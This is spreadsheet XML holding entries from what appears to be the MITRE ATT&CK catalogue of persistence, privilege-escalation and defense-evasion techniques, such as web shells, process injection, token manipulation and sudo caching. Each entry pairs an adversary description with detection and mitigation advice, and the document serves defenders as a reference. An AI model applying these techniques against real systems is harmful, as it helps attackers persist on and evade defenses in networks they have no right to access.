  <si>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</si>
  <si>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Prevent plist files from being modified by users by making them read-only.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1150</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</t>
  </si>
  <si>
    <t>Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <t>Port Monitors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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by processes running under SYSTEM permissions.</t>
  </si>
  <si>
    <t>File monitoring, API monitoring, DLL monitoring, Windows Registry</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1013</t>
  </si>
  <si>
    <t>T1504</t>
  </si>
  <si>
    <t>PowerShell Profile</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile  (&lt;code&gt;profile.ps1&lt;/code&gt;) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell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 drives to gain persistence. Every time a user opens a PowerShell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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1504</t>
  </si>
  <si>
    <t>T1163</t>
  </si>
  <si>
    <t>Rc.common</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</si>
  <si>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</si>
  <si>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The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.</t>
  </si>
  <si>
    <t>Limit privileges of user accounts so only authorized users can edit the rc.common file.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1163</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated.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network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.
Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.</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</si>
  <si>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</si>
  <si>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Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
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as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Office 365 account logs, Azure activity logs, AWS CloudTrail logs, Stackdriver logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1108</t>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</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</si>
  <si>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</si>
  <si>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Identify and block potentially malicious software that may be executed through run key or startup folder persistence using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1060</t>
  </si>
  <si>
    <t>T1164</t>
  </si>
  <si>
    <t>Re-opened Applications</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</si>
  <si>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</si>
  <si>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Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>Holding the Shift key while logging in prevents apps from opening automatically (Citation: Re-Open windows on Mac). This feature can be disabled entirely with the following terminal command: &lt;code&gt;defaults write -g ApplePersistence -bool no&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1164</t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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Block .scr files from being executed from non-standard locations. Set Group Policy to force users to have a dedicated screensaver where local changes should not override the settings to prevent changes. Use Group Policy to disable screensavers if they are unnecessary. (Citation: TechNet Screensaver GP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1180</t>
  </si>
  <si>
    <t>T1101</t>
  </si>
  <si>
    <t>Security Support Provider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</si>
  <si>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</si>
  <si>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</si>
  <si>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8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all SSP DLLs to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1101</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>Adversaries may abuse legitimate extensible development features of server applications to establish persistent access to systems. Enterprise server applications may include features that allow application developers to write and install software to extend the functionality of the main application. Adversaries may install malicious software components to maliciously extend and abuse server applications.
###Transport Agent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###SQL Stored Procedures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&lt;code&gt;xp_cmdshell&lt;/code&gt;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these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR)</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</si>
  <si>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On MSSQL Server, consider monitoring for &lt;code&gt;xp_cmdshell&lt;/code&gt; usage.(Citation: NetSPI Startup Stored Procedures)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505</t>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <t>Service Registry Permissions Weakness</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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086),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TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)</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</si>
  <si>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</si>
  <si>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Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.
Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1058</t>
  </si>
  <si>
    <t>T1166</t>
  </si>
  <si>
    <t>Setuid and Setgid</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</si>
  <si>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</si>
  <si>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Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1166</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 (Citation: UCF STIG Symbolic Links)
Identify and block unknown, potentially malicious software that may be executed through shortcut modification by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1023</t>
  </si>
  <si>
    <t>T1198</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Also ensure that these values contain their full path to prevent [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). (Citation: SpectorOps Subverting Trust Sept 2017)
Consider removing unnecessary and/or stale SIPs. (Citation: SpectorOps Subverting Trust Sept 2017)
Restrict storage and execution of SIP DLLs to protected directories, such as C:\Windows, rather than user directories.
Enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.</t>
  </si>
  <si>
    <t>API monitoring, Application logs, DLL monitoring, Loaded DLLs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1198</t>
  </si>
  <si>
    <t>T1165</t>
  </si>
  <si>
    <t>Startup Items</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Since StartupItems are deprecated, preventing all users from writing to the &lt;code&gt;/Library/StartupItems&lt;/code&gt; directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can't be leveraged for privilege escalation.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1165</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1019</t>
  </si>
  <si>
    <t>T1501</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>Systemd services can be used to establish persistence on a Linux system.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recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)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</si>
  <si>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 xml:space="preserve">The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. Limit user access to system utilities such as systemctl to only users who have a legitimate need. Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services. Additionally, the installation of software commonly adds and changes systemd service unit files. Restrict software installation to trusted repositories only and be cautious of orphaned software packages. Utilize malicious code protection and application whitelisting to mitigate the ability of malware to create or modify systemd services. </t>
  </si>
  <si>
    <t>root, User</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1501</t>
  </si>
  <si>
    <t>T1209</t>
  </si>
  <si>
    <t>Time Providers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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify and block potentially malicious software that may be executed as a time provider by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.
Consider using Group Policy to configure and block subsequent modifications to W32Time parameters. (Citation: Microsoft W32Time May 2017)</t>
  </si>
  <si>
    <t>API monitoring, Binary file metadata, DLL monitoring, File monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1209</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ensure that externally facing Web servers are patched regularly to prevent adversary access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages. 
Audit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)</t>
  </si>
  <si>
    <t>Anti-virus, Authentication logs, File monitoring, Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1100</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</si>
  <si>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</si>
  <si>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</si>
  <si>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into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)</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</si>
  <si>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t>
  </si>
  <si>
    <t>Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1084</t>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.
Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1004</t>
  </si>
  <si>
    <t>TA0004</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t xml:space="preserve">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â€¢	SYSTEM/root level
â€¢	local administrator
â€¢	user account with admin-like access 
â€¢	user accounts with access to specific system or perform specific function
These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0004</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>Access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</si>
  <si>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system.(Citation: Pentestlab Token Manipulation)
Access tokens can be leveraged by adversaries through three methods:(Citation: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privileges.(Citation: Metasploit access token) The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access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</si>
  <si>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t>
  </si>
  <si>
    <t>Access tokens are an integral part of the security system within Windows and cannot be turned off. However, an attacker must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require to do their job.
Any user can also spoof access tokens if they have legitimate credentials. Follow mitigation guidelines for preventing adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078).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 (Citation: Microsoft Replace Process Token)
Also limit opportunities for adversaries to increase privileges by limiting Privilege Escalation opportunities.</t>
  </si>
  <si>
    <t>defense-evasion, privilege-escalation</t>
  </si>
  <si>
    <t>API monitoring, Access tokens, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134</t>
  </si>
  <si>
    <t>T1088</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Remove users from the local administrator group on systems. Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). 
Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate. (Citation: Github UACMe)</t>
  </si>
  <si>
    <t>System calls, Process monitoring, Authentication logs, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1088</t>
  </si>
  <si>
    <t>T1514</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>Adversaries may leverage the AuthorizationExecuteWithPrivileges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AuthorizationExecuteWithPrivileges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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1514</t>
  </si>
  <si>
    <t>T1068</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)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components targeted for privilege escalation.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1068</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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EWM injection may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions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</si>
  <si>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https://attack.mitre.org/techniques/T1181</t>
  </si>
  <si>
    <t>T1502</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</si>
  <si>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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be &lt;code&gt;explorer.exe&lt;/code&gt; rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Execution through API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1502</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>Process Injection</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</si>
  <si>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</si>
  <si>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This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. (Citation: GDSecurity Linux injection)
Identify or block potentially malicious software that may contain process injection functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
Utilize Yama  (Citation: Linux kernel Yama) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux  (Citation: SELinux official), grsecurity  (Citation: grsecurity official), and AppArmor  (Citation: AppArmor official).</t>
  </si>
  <si>
    <t>API monitoring, Windows Registry, File monitoring, DLL monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055</t>
  </si>
  <si>
    <t>T1178</t>
  </si>
  <si>
    <t>SID-History Injection</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Clean up SID-History attributes after legitimate account migration is complete.
Consider applying SID Filtering to interforest trusts, such as forest trusts and external trusts, to exclude SID-History from requests to access domain resources. SID Filtering ensures that any authentication requests over a trust only contain SIDs of security principals from the trusted domain (i.e. preventing the trusted domain from claiming a user has membership in groups outside of the domain).
SID Filtering of forest trusts is enabled by default, but may have been disabled in some cases to allow a child domain to transitively access forest trusts. SID Filtering of external trusts is automatically enabled on all created external trusts using Server 2003 or later domain controllers. (Citation: Microsoft Trust Considerations Nov 2014) (Citation: Microsoft SID Filtering Quarantining Jan 2009) However note that SID Filtering is not automatically applied to legacy trusts or may have been deliberately disabled to allow inter-domain access to resources.
SID Filtering can be applied by: (Citation: Microsoft Netdom Trust Sept 2012)
* Disabling SIDHistory on forest trusts using the netdom tool (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /EnableSIDHistory:no&lt;/code&gt; on the domain controller). 
* Applying SID Filter Quarantining to external trusts using the netdom tool (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /quarantine:yes&lt;/code&gt; on the domain controller)
Applying SID Filtering to domain trusts within a single forest is not recommended as it is an unsupported configuration and can cause breaking changes. (Citation: Microsoft Netdom Trust Sept 2012) (Citation: AdSecurity Kerberos GT Aug 2015) If a domain within a forest is untrustworthy then it should not be a member of the forest. In this situation it is necessary to first split the trusted and untrusted domains into separate forests where SID Filtering can be applied to an interforest trust.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1178</t>
  </si>
  <si>
    <t>T1169</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>The sudoers file should be strictly edited such that passwords are always required and that users can't spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1169</t>
  </si>
  <si>
    <t>T1206</t>
  </si>
  <si>
    <t>Sudo Caching</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</si>
  <si>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</si>
  <si>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This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>Setting the &lt;code&gt;timestamp_timeout&lt;/code&gt; to 0 will require the user to input their password every time &lt;code&gt;sudo&lt;/code&gt; is executed. Similarly, ensuring that the &lt;code&gt;tty_tickets&lt;/code&gt; setting is enabled will prevent this leakage across tty sessions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1206</t>
  </si>
  <si>
    <t>TA0005</t>
  </si>
  <si>
    <t>Defense Evasion</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/tactics/TA0005</t>
  </si>
  <si>
    <t>T1527</t>
  </si>
  <si>
    <t>Application Access Token</t>
  </si>
  <si>
    <t>Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications.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</si>
  <si>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defense-evasion, lateral-movement</t>
  </si>
  <si>
    <t>SaaS, Office 365</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1527</t>
  </si>
  <si>
    <t>T1009</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists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</si>
  <si>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</si>
  <si>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Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary,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</si>
  <si>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https://attack.mitre.org/techniques/T1009</t>
  </si>
  <si>
    <t>T1146</t>
  </si>
  <si>
    <t>Clear Command History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</si>
  <si>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</si>
  <si>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</si>
  <si>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Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their &lt;code&gt;~/.bash_history&lt;/code&gt; files. Additionally, making these environment variables readonly can make sure that the history is preserved   (Citation: Securing bash history).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1146</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <t>Code Signing</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system. (Citation: NSA MS AppLocker) (Citation: TechNet Trusted Publishers) (Citation: Securelist Digital Certificates)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1116</t>
  </si>
  <si>
    <t>T1500</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027),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[Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
</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</si>
  <si>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</si>
  <si>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This type of technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, blocking all file compilation may have unintended side effects, such as preventing legitimate OS frameworks and code development mechanisms from operating properly. Consider removing compilers if not needed, otherwise efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.
Identify unnecessary system utilities or potentially malicious software that may be used to decrypt, deobfuscate, decode, and compile files or information,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</si>
  <si>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https://attack.mitre.org/techniques/T1500</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Connection 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</si>
  <si>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reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims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Internal connection proxies can be used to consolidate internal connections from compromised systems. Adversaries may use a compromised internal system as a proxy in order to conceal the true destination of C2 traffic. The proxy can redirect traffic from compromised systems inside the network to an external C2 server making discovery of malicious traffic difficult. Additionally, the network can be used to relay information from one system to another in order to avoid broadcasting traffic to all systems.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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command-and-control, defense-evasion</t>
  </si>
  <si>
    <t>Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>DCShadow</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</si>
  <si>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</si>
  <si>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This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of AD design features. For example, mitigating specific AD API calls will likely have unintended side effects, such as preventing DC replication from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.</t>
  </si>
  <si>
    <t>API monitoring, Authentication logs, Network protocol analysis, Packet capture</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1207</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify unnecessary system utilities or potentially malicious software that may be used to deobfuscate or decode files or information,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</si>
  <si>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https://attack.mitre.org/techniques/T1140</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.</t>
  </si>
  <si>
    <t>Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.</t>
  </si>
  <si>
    <t>API monitoring, File monitoring, Services, Windows Registry</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1089</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Update software regularly. Install software in write-protected locations. Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1073</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Execution guardrails constrain execution or actions based on adversary supplied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
Environmental keying is one type of guardrail that includes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guardrails and environmental keying to help protect their TTPs and evade detection. For example,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In general, guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) where a decision can be made not to further engage because the value conditions specified by the adversary are meant to be target specific and not such that they could occur in any environment.</t>
  </si>
  <si>
    <t>Detecting the action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</si>
  <si>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https://attack.mitre.org/techniques/T1480</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</si>
  <si>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</si>
  <si>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</si>
  <si>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code.Â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</si>
  <si>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</si>
  <si>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exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)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targeted for defense evasion.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1211</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>File and directory permissions are commonly managed by discretionary access control lists (DACLs) specified by the file or directory owner. File and directory DACL implementations may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). (Citation: Microsoft DACL May 2018) (Citation: Microsoft File Rights May 2018) (Citation: Unix File Permissions)
Adversaries may modify file or directory permissions/attributes to evade intended DACLs. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions such as Administrator/root depending on the file or directory's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files/directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1015), [Logon Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files.</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file/directory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file/directory permission change auditing on folders containing key binary/configuration files. Windows Security Log events (Event ID 4670) are used when DACLs are modified. (Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files,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</si>
  <si>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https://attack.mitre.org/techniques/T1107</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify potentially malicious software that may be used to access logical drives in this manner,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</si>
  <si>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https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>T1144</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Other tools should be used to supplement Gatekeeper's functionality. Additionally, system settings can prevent applications from running that haven't been downloaded through the Apple Store which can help mitigate some of these issues.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1144</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t xml:space="preserve">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 </t>
  </si>
  <si>
    <t>Identify and correct GPO permissions abuse opportunities (ex: GPO modification privileges) using auditing tools such as Bloodhound (version 1.5.1 and later)(Citation: GitHub Bloodhound).
Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.(Citation: Wald0 Guide to GPOs)(Citation: Microsoft WMI Filters)(Citation: Microsoft GPO Security Filtering)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484</t>
  </si>
  <si>
    <t>T1147</t>
  </si>
  <si>
    <t>Hidden Users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</si>
  <si>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</si>
  <si>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This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</t>
  </si>
  <si>
    <t>If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; &lt;code&gt;Hide500Users&lt;/code&gt; value will force all users to be visible.</t>
  </si>
  <si>
    <t>Administrator, root</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1147</t>
  </si>
  <si>
    <t>T1143</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may implement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operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.
### Windows
